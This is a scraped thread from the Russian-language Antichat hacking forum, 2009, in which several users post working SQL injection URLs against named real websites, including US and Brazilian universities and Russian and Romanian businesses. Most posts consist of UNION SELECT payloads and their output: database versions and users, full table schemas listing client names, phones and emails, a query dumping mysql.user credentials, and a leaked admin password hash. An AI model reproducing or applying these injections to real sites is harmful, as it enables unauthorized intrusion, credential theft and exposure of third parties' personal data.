ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9721  
Старый 06.06.2009, 22:50
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.sc.edu {PR 7} {ТИЦ 400}
Код:
http://www.sc.edu/library/news/index.php?mode=view&id=-252+union+select+1,unhex(hex(user())),3,4,5,6,7,8,9,10,11,12,13/*
version - 4.1.13-log
database - news
user - web@www.sc.edu

mysql.user:
Код:
http://www.sc.edu/library/news/index.php?mode=view&id=-252+union+select+1,unhex(hex(group_concat(user,0x3a,password))),3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*
 
Ответить с цитированием

  #9722  
Старый 07.06.2009, 00:34
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://forum.trizland.com/task.php?id=1832+and+substring(version(),1,1)=4


http://pod-ezd.ru/index.php?page=documents&id=-42+UNION+SELECT+1,2,CONCAT(0x7873716C696E6A6265676 96E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,Use r(),0x7873716C696E6A656E64),4,5,6,7,8,9,10,11/*

Database Version: 5.0.42
Database name: pod-ezd
User name: pod-ezd@localhost


Код:
Database [pod-ezd]
    Table [baners  ( Rows)]
        id
        link
        img
        active
    Table [clients  ( Rows)]
        id
        first_name
        middle_name
        last_name
        phone
        email
        city
        organization
        dt
    Table [contacts  ( Rows)]
        id
        img
        body
    Table [documents  ( Rows)]
        id
        title
        body
        dt
        active
        doc_cat_id
        in_arhive
        lang
        file_img
    Table [documents_category  ( Rows)]
        id
        title
    Table [menu  ( Rows)]
        id
        title
        parent_id
        page
        sub_page
        action
        entry_id
        active
        sort
        lang
        href
    Table [mods_net  ( Rows)]
        id
        part
        mod
        square
        size
        price1
        price2
        price3
        price4
        price5
    Table [mods_net_1sm_price  ( Rows)]
        id
        price
    Table [mods_net_doc  ( Rows)]
        id
        doc_id
    Table [modules  ( Rows)]
        id
        mod_name
        parent_id
        sort
        is_on_site
    Table [options  ( Rows)]
        id
        name
        value
    Table [partners  ( Rows)]
        id
        title
        link
        active
        img
    Table [persons  ( Rows)]
        id
        first_name
        middle_name
        last_name
        post
        phone
        active
        img_file
    Table [releases  ( Rows)]
        id
        dt
        file_pdf
        file_img
        text
        active
    Table [user  ( Rows)]
        id
        username
        password
        first_name
        middle_name
        last_name
        email
        phone
        active
        date
Содержание таблицы user:

admin:b717415eb5e699e4989ef3e2c4e9cbf7

1 запись.
 
Ответить с цитированием

  #9723  
Старый 07.06.2009, 01:24
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.ohiolearns.org {PR 6}
Код:
http://www.ohiolearns.org/catalog/displaydegree.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
4.0.26-Max:catalog:dbdev@192.168.1.162

table users:
Код:
http://www.ohiolearns.org/catalog/displaydegree.php?id=-1+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users+limit+0,1/*
 
Ответить с цитированием

  #9724  
Старый 07.06.2009, 01:34
trefet2
Новичок
Регистрация: 25.05.2009
Сообщений: 5
Провел на форуме:
23792

Репутация: 20
По умолчанию

http://www.westcomp.ru/pricepos.php?id=-1+union+Select+1,2,3,4,concat_ws(0x20,id,fname,mna me,email,password),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29+from+USERLIST _TAB--
 
Ответить с цитированием

  #9725  
Старый 07.06.2009, 01:42
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.ces.fau.edu PR 6
Код:
http://www.ces.fau.edu/sfrsf/detail.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
database version - 5.0.51a-3ubuntu5.4
database name - test
user name - sfrsf@localhost
 
Ответить с цитированием

  #9726  
Старый 07.06.2009, 08:23
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.coinfo.cefetpb.edu.br/cursos.php?id=1+and+substring(version(),1,1)=5--

##########################################
http://www.unissa.edu.br/website/cursosPosGraduacaoView.php?id=-1+union+select+1,concat_Ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12--

unissa@localhost:unissa:4.0.15-log

Последний раз редактировалось HAXTA4OK; 07.06.2009 в 08:26..
 
Ответить с цитированием

  #9727  
Старый 07.06.2009, 08:34
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.ucluj.tv/index.php?VideoID=-612+UNION+SELECT+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8

Database Version: 5.0.81-community-log
Database name: uclujtv_db
User name: uclujtv_user@localhost
Os : pc-linux-gnu
 
Ответить с цитированием

  #9728  
Старый 07.06.2009, 09:44
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://doska.alvisp.ru/details.php?id=-1011339+union+select+1,2,3,4,5,6,7,8,9,10,11,conca t_ws(0x3a,user(),database(),version()),13,14,15,16 ,17,18,19+from+mysql.user--

http://doska.alvisp.ru/details.php?id=-1011339+union+select+1,2,3,4,5,6,7,8,9,10,11,file_ priv,13,14,15,16,17,18,19+from+mysql.user--
Y
 
Ответить с цитированием

  #9729  
Старый 07.06.2009, 09:47
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.eurotrucks.ro/stoc-camioane-noi.php?TruckCategoryID=6/**/AND/**/SUBSTRING((version),1,1)=x&Action=SetTruckCategoryFilter


Version :5.0.81-community-log
Database : eurotruc_db
User : eurotruc_dbuser@localhost
Os : pc-linux-gnu



http://www.universitateacluj.ro/poze.php?AlbumID=3+AND+SUBSTRING((version()),1,1)=x&pagina=5&subPagina=20

Version : 5.0.81-community-log
Database : universi_db
User : universi_mircea@localhost
Os : pc-linux-gnu
 
Ответить с цитированием

  #9730  
Старый 07.06.2009, 09:54
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.ndelo.ru/one_stat.php?id=838+and+substring(version(),1,1)=4--



http://sibkray.ru/vn/index.php?id=-97473+union+select+1,concat_ws(0x3a,user(),databas e(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25--

sibkray_site@localhost:sibkray_site:5.0.45

tables:
Цитата:
sibkray_cat,sibkray_conf_vopr_otvet,sibkray_expert _exp_cat,bs_cat,bs_mesta,sibkray_vote_otvet,vn_cat _articles,sibkray_informer_cat,vn_music,sibkray_st ring,sibkray_valuts,sibkray_cat_articles,sibkray_e xpert_article,sibkray_expert_message,bs_click,bs_p okaz,vn_articles,sibkray_foto,vn_cat_articles1,sib kray_music,vn_video,sibkray_tv_channel,sibkray_vid eo,bs_video,sibkray_comments,sibkray_expert_cat,bs _company,vn_articles1,sibkray_id_inf,vn_comments,s ibkray_pog_fact,sibkray_tv_pr_date,sibkray_vote,si bkray_articles,sibkray_conf,sibkray_expert_exp,bs_ klients,sibkray_vote_ip,vn_cat,sibkray_informer,vn _foto,sibkray_pogoda_3day,sibkray_tv_programm

Последний раз редактировалось HAXTA4OK; 07.06.2009 в 10:02..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ